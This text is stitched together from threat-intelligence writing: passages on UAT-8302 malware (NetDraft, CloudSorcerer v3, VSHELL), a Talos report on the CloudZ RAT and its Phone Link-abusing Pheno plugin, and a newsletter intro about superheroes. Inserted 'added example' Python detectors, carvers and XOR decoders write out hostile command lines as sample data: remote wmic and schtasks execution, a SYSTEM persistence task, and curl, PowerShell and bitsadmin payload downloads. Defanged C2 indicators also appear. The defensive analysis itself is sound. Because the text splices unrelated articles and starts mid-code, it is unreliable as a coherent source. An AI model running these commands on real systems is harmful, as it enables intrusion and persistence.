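REMOTE_SCHTASKS = re.compile(r"\bschtasks\b.*\s/S\s+\S+", re.I)
WMIC_REMOTE = re.compile(r"\bwmic\b.*\s/node:\S+.*\bprocess\s+call\s+create\b", re.I)
FOR_LOOP = re.compile(r"\bfor\s+/l\s+%\w+\s+in\s*\(", re.I)
SWEEP_PROBE = re.compile(r"\bping\b|\\IPC\$", re.I)


def parse_ts(ts):
    return datetime.fromisoformat(ts.replace("Z", "+00:00"))


def alert(rule, host, ts, detail):
    return {"rule": rule, "host": host, "ts": ts.isoformat(), "detail": detail}


def recon_category(cmd):
    for name, pat in RECON_PATTERNS.items():
        if pat.search(cmd):
            return name
    return None


def recon_bursts(parsed):
    """One alert per host whose discovery commands span >= BURST_THRESHOLD categories in a window."""
    by_host = defaultdict(list)
    for ts, host, _user, cmd in parsed:
        cat = recon_category(cmd)
        if cat:
            by_host[host].append((ts, cat))
    alerts = []
    for host, items in by_host.items():
        for i, (start, _) in enumerate(items):
            seen = {cat for ts, cat in items[i:] if ts - start <= BURST_WINDOW}
            if len(seen) >= BURST_THRESHOLD:
                alerts.append(alert("recon_burst", host, start, f"{len(seen)} distinct discovery commands"))
                break
    return alerts


def detect(events):
    parsed = sorted(((parse_ts(ts), host, user, cmd) for ts, host, user, cmd in events), key=lambda e: e[0])
    alerts = []
    for ts, host, _user, cmd in parsed:
        if SCHTASKS_CREATE.search(cmd) and RUN_AS_SYSTEM.search(cmd) and STAGING_DIR.search(cmd):
            alerts.append(alert("staged_task_as_system", host, ts, cmd))
        if REMOTE_SCHTASKS.search(cmd) or WMIC_REMOTE.search(cmd):
            alerts.append(alert("remote_exec", host, ts, cmd))
        if FOR_LOOP.search(cmd) and SWEEP_PROBE.search(cmd):
            alerts.append(alert("host_sweep", host, ts, cmd))
    alerts.extend(recon_bursts(parsed))
    return alerts


if __name__ == "__main__":
    for a in detect(EVENTS):
        print(a["ts"], a["host"], a["rule"], a["detail"][:60])
```

The single-command rules are cheap and precise enough to run inline; the burst rule is the one that catches "whatpc.ps1"-style scripted recon even when each individual command is something an administrator might legitimately run, which is why it counts distinct techniques rather than raw command volume.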
Furthermore, UAT-8302 may also extract login credentials from MobaXterm, a tabbed, multi-function SSH client, using tools such as MobaXtermDecryptor to pivot to other endpoints.
Custom-made malware deployment
UAT-8302 deploys a variety of malware families in their intrusions including NetDraft, CloudSorcerer version 3, and VSHELL.
NetDraft
NetDraft, also known as NosyDoor, is a .NET variant of the FINALDRAFT malware. FINALDRAFT or Squidoor is a malware family developed and operated exclusively by Jewelbug/REF7707/CL-STA-0049, a cluster of China-nexus APT actors. FINALDRAFT uses legitimate services such as MS Graph to act as command-and-control servers (C2s) to execute commands and payloads on the compromised system. Similarly, NetDraft relies on the MS Graph API to communicate with its OneDrive based C2. NetDraft is deployed using the following mechanism:
A benign executable is used to side load a malicious dynamic-link library (DLL) based loader.
The loader DLL decodes NetDraft from an accompanying data file and invokes it in the context of the existing process.
NetDraft also contains an embedded, .NET-based helper library. The library is compressed and embedded using the Fody/Costura framework. During runtime, the library is decompressed and instrumented to carry out operations on the endpoint on behalf of NetDraft. We track this library as “FringePorch.”
Figure 2. NetDraft and FringePorch infection chain.
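Because FringePorch travels inside NetDraft as a Costura-embedded resource, an analyst usually wants it out as a separate file before looking at it. Here is an added example (not Talos tooling) of that step: it recognises Costura's resource naming convention, inflates the raw-DEFLATE payload that .NET's DeflateStream produces, and keeps only results that carry a PE header. The resource map is constructed here around a fake assembly stub; in practice it would come from a .NET metadata parser, and the resource name costura.fringeporch.dll.compressed is an assumption for the demo, not a name observed in the sample.

```python
import zlib

# Costura.Fody naming convention: "costura." + lower-cased file name, with a
# ".compressed" suffix when the embedded assembly was DEFLATE-compressed.
COSTURA_PREFIX = "costura."
COMPRESSED_SUFFIX = ".compressed"


def costura_assembly_name(resource_name: str):
    """Map a Costura resource name to the embedded file name, or None if not Costura."""
    if not resource_name.startswith(COSTURA_PREFIX):
        return None
    name = resource_name[len(COSTURA_PREFIX):]
    if name.endswith(COMPRESSED_SUFFIX):
        name = name[:-len(COMPRESSED_SUFFIX)]
    return name


def inflate_costura_resource(data: bytes) -> bytes:
    # DeflateStream writes raw DEFLATE with no zlib header, hence wbits=-15.
    return zlib.decompress(data, wbits=-15)


def is_pe(blob: bytes) -> bool:
    return blob[:2] == b"MZ"


def carve_embedded(resources: dict) -> dict:
    """Recover embedded assemblies from a {resource_name: bytes} map.

    Returns {file_name: bytes} for every Costura resource that inflates (or
    already is) a PE image; other resources are ignored.
    """
    out = {}
    for name, data in resources.items():
        target = costura_assembly_name(name)
        if target is None:
            continue
        blob = inflate_costura_resource(data) if name.endswith(COMPRESSED_SUFFIX) else data
        if is_pe(blob):
            out[target] = blob
    return out


def _raw_deflate(blob: bytes) -> bytes:
    """Compress the way Costura does, for building the constructed sample below."""
    c = zlib.compressobj(level=9, wbits=-15)
    return c.compress(blob) + c.flush()


# Constructed stand-in for the helper library: a DOS stub signature plus
# filler, stored compressed as Costura would. Not a real assembly.
SAMPLE_ASSEMBLY = b"MZ" + b"\x90" * 62 + b"PE\x00\x00" + b"helper library (constructed)".ljust(64, b"\x00")
SAMPLE_RESOURCES = {
    "costura.fringeporch.dll.compressed": _raw_deflate(SAMPLE_ASSEMBLY),  # assumed name
    "costura.readme.txt": b"not a PE image",                             # Costura-named, not PE
    "app.config": b"<configuration/>",                                    # ordinary resource
}

if __name__ == "__main__":
    for file_name, blob in carve_embedded(SAMPLE_RESOURCES).items():
        print(file_name, len(blob), "bytes, PE:", is_pe(blob))
```

Once carved, the helper can be loaded in a .NET decompiler on its own, which is how the split of responsibilities between NetDraft and FringePorch described below becomes visible.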
NetDraft and FringePorch support the following functionalities:
Execute arbitrary commands on the endpoint
Execute a .NET based assembly sent by the C2 within NetDraft’s process context
Exit and stop execution
Upload files to C2
Download files from specified remote locations to local disks
File management: Change current working directory, rename files, enumerate files, and set write times
Sleep
Execute a .NET plugin: This functionality is similar to its ability to run arbitrary .NET-based assemblies. Here, the implant runs the provided plugin’s “Plugin.Run” function.
Since NetDraft is missing the capability to persist across reboots and relogins, one of the first commands the C2 issues to it is the creation of a malicious scheduled task:
Another malware UAT-8302 deploys is the latest version of the CloudSorcerer backdoor (version 3). The malware consists of the side-loading triad of files: a benign executable, a malicious DLL-based loader, and the actual implant in a data file:
The executables will sideload a DLL named “mspdb60[.]dll”, which will load and decrypt the “.ini” file specified in the command line — such as “test.ini” or “vm.ini”. The decrypted shellcode is then injected into a combination of specified benign processes.
CloudSorcerer v3 – The decrypted shellcode
The decrypted INI file is a newer version of CloudSorcerer (v3), first disclosed by Kaspersky in 2024. Depending on the name of the process it was started in or injected into, CloudSorcerer v3 performs one of the following actions:
If the process is named “dpapimig.exe”, it gathers system information, injects itself into explorer.exe, and receives command codes from the C2 via a named pipe, through which it can gather disk information, enumerate files, execute arbitrary commands, perform file operations (delete, rename, read, write, etc.), and execute shellcode received over the same named pipe.
If the process is named “spoolsv.exe”, it contacts GitHub to obtain C2 information and receives commands from the C2.
If the process is named “mspaint.exe”, “browser”, or anything else, it injects itself into dpapimig.exe, spoolsv.exe, etc. to kick off its malicious operations.
The system information CloudSorcerer v3 collects includes computer name, username and local system time.
Obtaining C2 information
Like CloudSorcerer v2, version 3 contacts a legitimate service to obtain the C2 information. The malware will either contact a specific GitHub repository to read a data blob, or read a GameSpot profile the threat actors set up.
The data blob is decoded to obtain the C2 information, which can exist in one of the following formats depending on the variant of the CloudSorcerer backdoor:
A C2 URL for a domain or IP, controlled by UAT-8302, that the malware uses to begin communication with the C2 to carry out malicious operations
An access token to a legitimate service (such as OneDrive or Dropbox) that UAT-8302 uses to act as its C2 infrastructure to obtain next-stage payloads and commands
VSHELL, SNOWLIGHT and SNOWRUST
In other instances, UAT-8302 deploys the VSHELL malware via a slightly different triad of artifacts for side-loading malware. The benign executable side-loads a malicious DLL named “wininet[.]dll” that reads a BIN file and injects it into “explorer[.]exe”.
The payload is position-independent shellcode that is injected into explorer[.]exe. The payload is a stager for the VSHELL malware that downloads and single-byte XORs the obtained payload with the key 0x99. The decoded payload is a garbled version of VSHELL.
It is worth noting that Talos observed the same single byte key and stager being used by UAT-6382 to deliver VSHELL malware in early 2025. Further investigation revealed that this stager is in fact SNOWLIGHT, a lightweight downloader that can download and deploy a next stage payload. UNC5174 has been observed using SNOWLIGHT to download Sliver and VSHELL. UNC5174 is a suspected China-nexus threat actor that typically exploits zero-day and n-day vulnerabilities to gain access to critical infrastructure organizations in the Americas.
Talos discovered that UAT-8302 also used a Rust based variant of SNOWLIGHT that we track as “SNOWRUST.” SNOWRUST is based on the LexiCrypt Rust-based shellcode obfuscator. SNOWRUST simply decodes the embedded SNOWLIGHT shellcode and executes it to download the XOR encoded final payload, VSHELL, received from the C2.
In one intrusion, UAT-8302 used VSHELL to deploy a native driver from the Hades HIDS/HIPS software — an open-source Windows host monitoring kernel framework written in Simplified Chinese. The driver was specifically the System Monitoring filter driver that lets Hades register callbacks for process, thread, registry, and file events. This allows the driver to monitor the system and potentially allow, block, or hide events and artifacts.
In parallel, UAT-8302 also deployed Draculoader, a generic shellcode loader, also used by the Earth Estries and Earth Naga APT groups who have histories of targeting government agencies in Southeast Asia and elsewhere:
C:\Documents and Settings\All Users\Microsoft\Crypto\RSA\d3d8.dll
Setting up additional means of backdoor access
Once UAT-8302 deploys their custom-made malware, they begin establishing other means of backdoor access. One of the techniques used is setting up proxy servers on infected systems to tunnel traffic outside the enterprise to the infected hosts using tools such as Stowaway (another tool written in Simplified Chinese):
Cisco Talos discovered an intrusion, active since at least January 2026, where an unknown attacker implanted a CloudZ remote access tool (RAT) and a previously undocumented plugin called “Pheno.”
According to the functionalities of the CloudZ RAT and Pheno plugin, this was with the intention of stealing victims’ credentials and potentially one-time passwords (OTPs).
CloudZ utilizes the custom Pheno plugin to hijack the established PC-to-phone bridge by abusing the Microsoft Phone Link application, allowing the plugin to continuously scan for active Phone Link processes and potentially intercept sensitive mobile data like SMS and OTPs without deploying malware on the phone.
CloudZ evades detection by executing critical malicious functions dynamically in system memory and performing checks to avoid debuggers and sandbox environments.
Attacker abuses the Windows Phone Link application
Windows Phone Link (formerly "Your Phone") is a synchronization tool developed by Microsoft and built directly into Windows 10 and 11 that bridges a PC and a smartphone (Android or iPhone). By establishing a secure connection via Wi-Fi and Bluetooth, the application mirrors essential phone activities (such as application notifications and SMS messages) onto the computer screen, reducing the user’s need to physically interact with the mobile device while working on the computer. The Phone Link application writes synchronized phone data such as SMS messages, call logs, and the application notification history to the Windows PC in the application’s SQLite database file.
Talos observed that during an intrusion, an attacker attempted to abuse the Windows Phone Link application using the CloudZ RAT and its Pheno plugin. The Pheno plugin is designed to monitor an active PC-to-phone bridge established by the Phone Link application on the victim machine. With confirmed Phone Link activity on the victim's machine, the attacker using the CloudZ RAT can potentially intercept the Phone Link application’s SQLite database file (e.g., “PhoneExperiences-*.db”) on the victim machine, potentially compromising SMS-based OTP messages and other authenticator application notification messages.
Intrusion summary of CloudZ infection
Talos discovered from telemetry data that the intrusion began with an unknown initial access vector into the victim's environment, which led to the execution of a fake ScreenConnect application update executable. This malicious executable drops and executes an intermediate .NET loader executable, which subsequently deploys the modular CloudZ RAT on the victim’s machine. Upon execution, the RAT decrypts its configuration data, establishes an encrypted socket connection to the command-and-control (C2) server, and enters its command dispatcher mode.
CloudZ carries out C2 commands to exfiltrate credentials from the victim machine's browser data, and it downloads and implants a plugin. The plugin performs reconnaissance of the Microsoft Phone Link application on the victim machine and writes the reconnaissance data to an output file in a staging folder. CloudZ reads the Phone Link application data back from the staging folder and sends it to the C2 server.
Rust-compiled executable used as a dropper
Talos discovered a Rust-compiled 64-bit executable, disguised under file names such as “systemupdates.exe” or “Windows-interactive-update.exe”, that functions as a loader. The malicious loader was compiled on Jan. 1, 2026, and contains the developer string rustextractor.pdb.
When the loader is run on the victim machine, it decrypts and drops an embedded .NET loader binary disguised as a text file with the file names “update.txt” or “msupdate.txt” in the folder “C:\ProgramData\Microsoft\windosDoc\”.
Figure 1. Excerpt of rusty dropper code.
In another instance, Talos observed that the .NET loader was implanted in the victim machine by downloading it from an attacker-controlled staging server using the command shown below:
The dropper executes an embedded PowerShell script to establish persistence on the victim machine through a Windows scheduled task that executes the dropped malicious .NET loader. The script achieves this by first performing a runtime check to determine whether the dropped .NET loader is already active on the system: it queries all running processes with the Get-CimInstance Win32_Process command and filters for any instance of regasm.exe whose command line includes the string update.txt. If such an instance is found, the script silently exits without taking any action.
If the check indicates that the .NET loader is not running, the script establishes persistence by creating a scheduled task named SystemWindowsApis in the scheduled task folder \Microsoft\Windows\. It configures the task to trigger at system startup (/sc onstart) and to execute under the SYSTEM account (/ru SYSTEM) with the highest privilege level (/rl HIGHEST); the /f flag silently overwrites any existing task with the same name, allowing the malware to update its persistence mechanism. The task action runs the .NET loader through the living-off-the-land binary (LOLBin) regasm.exe, the .NET Framework Assembly Registration Utility located at “C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\”, passing the path of the dropped .NET loader as the argument together with the /nologo flag. After creating the task, the script immediately triggers it with schtasks /run, so the loader executes right away and survives future reboots.
Figure 2. Excerpt of the PowerShell script to establish persistence on victim machines.
.NET loader implants the CloudZ RAT
Talos found that the attacker embedded CloudZ, an encrypted .NET-compiled RAT, in the .NET loader executable.
When the .NET loader is triggered through the Windows task scheduler, it performs detection evasion checks, beginning with a timing-based check in which it measures the actual elapsed time of a sleep call to detect whether it is executing in an analysis environment. It then enumerates the running processes on the victim machine against a list of security tools, including network sniffers like Wireshark and Fiddler as well as system monitors like Procmon and Sysmon. The .NET loader exits if any of these are detected in the victim environment.
Figure 3. Excerpt of the .NET loader binary with detection evasion instructions.
The loader then conducts hardware and environment checks to identify virtual machine (VM) or sandbox characteristics. It verifies that the system has at least two processor cores and searches for strings like “VIRTUAL” or “SANDBOX” within the system directory path, computer name, user domain, and the current victim username.
Figure 4. Excerpt of the .NET loader binary with detection evasion instructions.
The loader executable embeds multiple chunks of hexadecimal strings, which are concatenated sequentially at runtime to reassemble a large hexadecimal data blob. The loader converts the hexadecimal string to bytes and performs bytewise XOR decryption with the single-byte key 0xCA. If the decrypted payload is a .NET assembly, the loader runs it reflectively; otherwise, it writes the decrypted payload to the folder “%TEMP%\{GUID}” and runs it as a process.
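The two decoding steps described in this post, the SNOWLIGHT stager's single-byte XOR (key 0x99) of VSHELL and the CloudZ loader's hex-chunk reassembly with XOR key 0xCA followed by its ".NET assembly or not" branch, as an added analysis example (not Talos's code and not the malware's). The key is brute-forced against the PE header rather than assumed, so one routine serves either sample; build_sample_pe constructs a minimal fake PE header for demonstration, and all function names are this example's own.

```python
"""Recover a single-byte-XOR-encoded PE payload and tell whether it is a .NET assembly.

Added example, not Talos or malware code. It mirrors two steps described in the post:
the SNOWLIGHT stager's XOR 0x99 decoding of VSHELL, and the CloudZ .NET loader's
hex-chunk reassembly, XOR 0xCA decoding and ".NET assembly or not" branch. The key is
recovered by brute force against the PE headers instead of being assumed, so one
routine serves both samples. build_sample_pe constructs a minimal fake PE header for
demonstration; it is not a real or runnable binary.
"""
import struct

PE_SIGNATURE = b"PE\x00\x00"
CLR_DIRECTORY_INDEX = 14  # IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR: populated only in .NET images


def reassemble_hex_chunks(chunks):
    """Concatenate the embedded hex string chunks in order and convert them to bytes."""
    return bytes.fromhex("".join(chunks))


def xor_decode(data, key):
    """Bytewise XOR with a single-byte key; XOR is its own inverse, so this also encodes."""
    return bytes(b ^ key for b in data)


def looks_like_pe(data):
    """Check the MZ stub, the e_lfanew pointer and the PE signature it points at."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == PE_SIGNATURE


def recover_xor_key(blob):
    """Try all 256 keys on the header only; return the key that yields a PE, else None."""
    for key in range(256):
        if looks_like_pe(xor_decode(blob[:0x400], key)):
            return key
    return None


def is_dotnet_assembly(pe):
    """True if the CLR runtime header data directory (entry 14) has a non-zero RVA and size."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    opt_off = e_lfanew + 4 + 20            # skip PE signature and 20-byte COFF file header
    magic = struct.unpack_from("<H", pe, opt_off)[0]
    if magic == 0x10B:                      # PE32: data directories start at +96
        dd_off = opt_off + 96
    elif magic == 0x20B:                    # PE32+: data directories start at +112
        dd_off = opt_off + 112
    else:
        return False
    num_dirs = struct.unpack_from("<I", pe, dd_off - 4)[0]  # NumberOfRvaAndSizes
    if num_dirs <= CLR_DIRECTORY_INDEX:
        return False
    rva, size = struct.unpack_from("<II", pe, dd_off + 8 * CLR_DIRECTORY_INDEX)
    return rva != 0 and size != 0


def analyse_blob(blob):
    """Recover the key, decode and classify. Returns (key, is_dotnet) or (None, None)."""
    key = recover_xor_key(blob)
    if key is None:
        return None, None
    return key, is_dotnet_assembly(xor_decode(blob, key))


def build_sample_pe(dotnet, pe32plus=False):
    """Constructed minimal PE header (1 KiB of mostly zeros) for the examples and tests."""
    e_lfanew = 0x80
    hdr = bytearray(0x400)
    hdr[:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, e_lfanew)
    hdr[e_lfanew:e_lfanew + 4] = PE_SIGNATURE
    opt_off = e_lfanew + 24
    magic, dd_off = (0x20B, opt_off + 112) if pe32plus else (0x10B, opt_off + 96)
    struct.pack_into("<H", hdr, opt_off, magic)
    struct.pack_into("<I", hdr, dd_off - 4, 16)  # NumberOfRvaAndSizes
    if dotnet:  # CLR header directory: constructed RVA/size, any non-zero pair will do
        struct.pack_into("<II", hdr, dd_off + 8 * CLR_DIRECTORY_INDEX, 0x2008, 0x48)
    return bytes(hdr)
```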
Figure 5. Excerpt of the .NET loader to execute the .NET payload module.
Figure 6. Excerpt of the .NET loader to execute the non-.NET payload executables.
Modular CloudZ RAT delivered as payload
Talos discovered that CloudZ, a modular RAT, is delivered as the payload in the current intrusion. CloudZ is a .NET executable compiled on Jan. 13, 2026, and is obfuscated with ConfuserEx.
Figure 7. The RAT binary shows the malware name, CloudZ.
CloudZ employs layers of defense against analysis environments and reverse engineering. It queries the _ENABLE_PROFILING environment variable via the GetEnvironmentVariable Windows API to detect whether a .NET profiler or debugger is attached to the RAT process on the victim machine, and it uses the .NET method “System.Reflection.Emit.DynamicMethod” together with “ILGenerator” to create executable functions dynamically while the RAT runs.
The operation of CloudZ utilizes its configuration data, which is embedded in the binary, as a resource that it decrypts and loads into memory during execution. The decrypted configuration data includes various C2 commands, PowerShell scripts for data archive extraction, multiple file download methods, paths and names of staging folders, multiple HTTP headers, and the URLs of the staging servers.
Figure 7. CloudZ primary configuration data decrypted in memory.
After the decryption of the configuration data, CloudZ decodes the Base64-encoded strings to get the URL of the staging server where the secondary configuration is stored.
Figure 8. CloudZ function that downloads the secondary configuration data from the staging server.
Talos found that the RAT downloads and processes secondary configuration data through the URLs “hxxps[://]round-cherry-4418[.]hellohiall[.]workers[.]dev/?t=1773406370” or "https[://]pastebin[.]com/raw/8pYAgF0Z?t=1771833517" and extracts the C2 server IP address “185[.]196[.]10[.]136” and port number 8089, establishing connections through TCP sockets.
Pivoting on the Pastebin URL indicator, we found that the attacker used the Pastebin handle “HELLOHIALL” and hosted the secondary configuration data at several Pastebin URLs.
The RAT rotates between three hardcoded user-agent strings to blend its HTTP traffic with the legitimate browser requests of the victim machine. Every HTTP request includes the anti-caching headers “Cache-Control: no-cache, no-store, must-revalidate”, “Pragma: no-cache”, and “Expires: 0”, which prevent intermediate proxies and CDN infrastructure from caching the C2 or staging server details.
User-agent headers used by the CloudZ are:
Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
After the RAT establishes the C2 connection, it enters its command dispatcher module, which relies on the decrypted configuration data loaded into memory. The configuration data contains Base64-encoded command identifiers that the RAT matches against the commands received from the C2 server to select the action to perform. The commands CloudZ supports are shown in the table below:
| Base64-encoded command | Decoded command | Purpose |
| --- | --- | --- |
| cG9uZw== | pong | Heartbeat response |
| UElORyE= | PING! | Heartbeat request |
| Q0xPU0U= | CLOSE | Terminate RAT process |
| SU5GTw== | INFO | Collects OS edition, architecture, and hardware details from the victim machine |
| UnVuU2hlbGw= | RunShell | Execute shell command |
| QnJvd3NlclNlYXJjaA== | BrowserSearch | Browser data exfiltration |
| R2V0V2lkZ2V0TG9n | GetWidgetLog | Phone Link recon logs and data exfiltration |
| cGx1Z2lu | plugin | Load plugin |
| c2F2ZVBsdWdpbg== | savePlugin | Save plugin to disk at the staging directory C:\ProgramData\Microsoft\whealth\ |
| c2VuZFBsdWdpbg== | sendPlugin | Upload plugin to C2 |
| UmVtb3ZlUGx1Z2lucw== | RemovePlugins | Remove all deployed plugin modules |
| UmVjb3Zlcnk= | Recovery | Recovery or reconnect routine |
| RFc= | DW | Download and write file operations |
| Rk0= | FM | File management operations – delete file |
| TE4= | LN | Unknown |
| TXNn | Msg | Send message to C2 |
| RXJyb3I= | Error | Error reporting back to C2 |
| cmVj | rec | Screen recording |
The RAT employs several methods to download and execute plugins. The plugin download feature uses a three-method fallback approach. It first checks for the presence of the curl utility; if found, it attempts to download the file from a specified URL to a target path while following redirects. If curl is missing or the command fails, it falls back to PowerShell, where it first tries to download the file with the Invoke-WebRequest command. If that method also fails, it executes a final method that uses the LOLBin “bitsadmin” to download and save the plugin payloads to the victim machine.
Figure 11. CloudZ’s embedded PowerShell command with three different approaches to download operation.
Talos observed from the telemetry data that the attacker has downloaded and implanted the Pheno plugin through the curl command from the staging server.
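A small process-creation rule set, added here as an example (not Talos code and not a Talos signature), that flags the command-line shapes quoted in this post: UAT-8302's WMI and schtasks remote process creation, the CloudZ SystemWindowsApis persistence task run through regasm.exe, and the curl / Invoke-WebRequest / bitsadmin download fallback. The event shape is a simplified Sysmon Event ID 1 record, and the host, URL and paths in the sample records (10.0.0.5, staging.example) are constructed.

```python
"""Flag process-creation events matching techniques described in this post.

Added example, not Talos code or a Talos signature. A small rule set run over
constructed records in a simplified Sysmon Event ID 1 shape (Image, CommandLine).
Rules cover UAT-8302's WMI/schtasks remote process creation, the CloudZ
SystemWindowsApis persistence task run through regasm.exe, and the
curl / Invoke-WebRequest / bitsadmin download fallback. Hosts and paths in the
sample records are constructed (10.0.0.5, staging.example).
"""
import re
from typing import Dict, List, Set, Tuple

# (rule name, tool that must be invoked, pattern over the normalised command line)
RULES: List[Tuple[str, str, re.Pattern]] = [
    ("wmi_remote_process_create", "wmic",
     re.compile(r"/node:\S+.*\bprocess\s+call\s+create\b")),
    # schtasks against a remote host (/s) creating a task that runs as SYSTEM
    ("schtasks_remote_task_as_system", "schtasks",
     re.compile(r"^(?=.*/create\b)(?=.*/s\s+\S+)(?=.*/ru\s+system\b)")),
    # boot-time SYSTEM task at the highest run level: the CloudZ persistence shape
    ("schtasks_onstart_system_task", "schtasks",
     re.compile(r"^(?=.*/create\b)(?=.*/sc\s+onstart\b)(?=.*/ru\s+system\b)(?=.*/rl\s+highest\b)")),
    # regasm.exe handed a file whose extension is not an assembly (update.txt in the post)
    ("regasm_loading_non_assembly", "regasm",
     re.compile(r"\S+\.(?:txt|dat|ini|log)(?=\s|$|\")")),
    ("curl_download_to_disk", "curl",
     re.compile(r"^(?=.*https?://)(?=.*(?:\s-[a-z]*o\s|\s--output\s))")),
    ("powershell_invoke_webrequest", "powershell",
     re.compile(r"^(?=.*https?://)(?=.*(?:invoke-webrequest|\biwr\b))")),
    ("bitsadmin_transfer", "bitsadmin",
     re.compile(r"/transfer\b")),
]


def normalise(command_line: str) -> str:
    """Lower-case and collapse whitespace so the patterns need only one spelling."""
    return " ".join(command_line.lower().split())


def tool_invoked(cmd: str, tool: str) -> bool:
    """True if `tool` appears as an executable token (bare, with .exe, or after a path)."""
    return re.search(rf"(?:^|[\s\"'\\]){tool}(?:\.exe)?(?=\s|$|[\"'])", cmd) is not None


def evaluate(event: Dict[str, str]) -> List[Tuple[str, str]]:
    """Return (rule name, original command line) for every rule the event matches."""
    cmd = normalise(event.get("CommandLine", ""))
    image = event.get("Image", "").lower().rsplit("\\", 1)[-1]
    hits = []
    for name, tool, pattern in RULES:
        if (image == f"{tool}.exe" or tool_invoked(cmd, tool)) and pattern.search(cmd):
            hits.append((name, event.get("CommandLine", "")))
    return hits


def rule_names(event: Dict[str, str]) -> Set[str]:
    return {name for name, _ in evaluate(event)}


def scan(events: List[Dict[str, str]]) -> List[Tuple[str, str]]:
    return [hit for event in events for hit in evaluate(event)]


# Constructed sample records; command lines follow the shapes quoted in the post.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /C wmic /node:10.0.0.5 process call create cmd.exe /c c:\programdata\e1.bat"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /C schtasks /S 10.0.0.5 /U username /P passwd /create /tn 'Runbat' "
                    r"/tr 'c:\windows\temp\run.bat' /sc ONCE /st 5:12 /ru SYSTEM /f"},
    {"Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r'schtasks /create /tn \Microsoft\Windows\SystemWindowsApis /tr '
                    r'"C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /nologo '
                    r'C:\ProgramData\Microsoft\windosDoc\update.txt" /sc onstart /ru SYSTEM /rl HIGHEST /f'},
    {"Image": r"C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\regasm.exe",
     "CommandLine": r"regasm.exe /nologo C:\ProgramData\Microsoft\windosDoc\update.txt"},
    {"Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": r"curl -L https://staging.example/pheno.bin -o C:\ProgramData\Microsoft\whealth\pheno.bin"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell -nop -w hidden -c "Invoke-WebRequest -Uri https://staging.example/pheno.bin '
                    r'-OutFile C:\ProgramData\Microsoft\whealth\pheno.bin"'},
    {"Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": r"bitsadmin /transfer job /download /priority normal https://staging.example/pheno.bin "
                    r"C:\ProgramData\Microsoft\whealth\pheno.bin"},
    {"Image": r"C:\Windows\System32\cmd.exe",  # benign: querying, not creating, a task
     "CommandLine": r"cmd.exe /C schtasks /query /tn \Microsoft\Windows\SystemWindowsApis"},
]
```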
Pheno plugin to perform the Phone Link application recon
In this intrusion, Talos observed that the attacker used a plugin called Pheno to perform reconnaissance of the Windows Phone Link application in the victim machine.
Pheno is designed to detect whether a user is currently syncing their mobile device to a Windows machine through the Phone Link application. It scans all running processes for specific keywords such as "YourPhone," "PhoneExperienceHost," or "Link to Windows," and if matches are found, it logs their process IDs and file paths to a file named “phonelink-<COMPUTERNAME>.txt”, created in two staging folders:
C:\programdata\Microsoft\feedback\cm
%TEMP%\Microsoft\feedback\cm
Figure 11. Pheno recon plugin that monitors an active PC-to-phone bridge through Phone Link application.
After checking Phone Link processes and writing its results, Pheno executes a secondary check that reads back the contents of previously written files and searches for the keyword "proxy" in a case-insensitive manner. The plugin conducts this check because the Microsoft Phone Link application creates a local proxy connection to relay traffic between the PC and the paired mobile device. The presence of "proxy" in output files generated by a previous execution of the Pheno plugin indicates that the Phone Link session is actively routing traffic through its relay channel.
When the keyword is detected, the Pheno plugin writes "Maybe connected" to its output file in the staging folders, which eventually allows the attacker, with the help of the CloudZ RAT, to potentially monitor SMS or OTP requests that appear in the Phone Link application.
Figure 12. Pheno checking for a previous instance of PC-to-phone bridge through Phone Link application.
Coverage
The following ClamAV signatures detect and block this threat:
Win.Packed.Msilheracles-10030690-0
Win.Trojan.CloudZRAT-10059935-0
Win.Trojan.CloudZRAT-10059959-0
The following Snort Rules (SIDs) detect and block this threat:
Snort 2: 66409, 66410, 66408
Snort 3: 301492, 66408
Indicators of compromise (IOCs)
The IOCs for this threat are available at our GitHub repository here.
Welcome to this week’s edition of the Threat Source newsletter.
As I’m writing this, today (April 28) is International Superhero Day. If you don’t know the origin story behind this, perhaps you would assume that this day was dreamed up by Marvel. And… you would be correct.
However, it’s not a pure marketing ploy. It all started in 1995, when colleagues in Marvel asked a group of school children what superpower they’d want the most.
Through the discussion, it became clear that the people in the children’s lives were already doing pretty heroic things, without the benefit of Hindsight Lad. (He’s a real Marvel invention — Carlton LaFroyge — whose superpower was to make aggressively obvious observations, delivered too late to matter. I’m sure we all have a real-life Carlton LaFroyge in our lives… heck, some of us ARE Carlton LaFroyge.)
Ok, before I get to my next point, I need to take you down the same internet wormhole I just disappeared into. Here are some of the weirdest superpowers ever committed to comic book lore:
Eye-Scream. His one power is to become ice cream (soft serve, apparently). Not to be confused with another Marvel character, Soft Serve, whose body acts as a portal to an ice cream dimension.
Doorman. Recently seen sending Josh Gad into the Dark Dimension (where there presumably is no ice cream) in the Marvel TV show “WonderMan.” Because his body is a door. Man.
The Wall. Has the ability to turn himself into a brick wall. I would genuinely love this ability during socially awkward networking events.
Now I’m thinking how awesome a character called “Internet Wormhole” would be. I just looked it up, and such a character doesn’t exist yet (call me, Marvel).
Right, let’s get back on topic. Ooh… “On topic” would be another good idea for a super… no, Hazel, no.
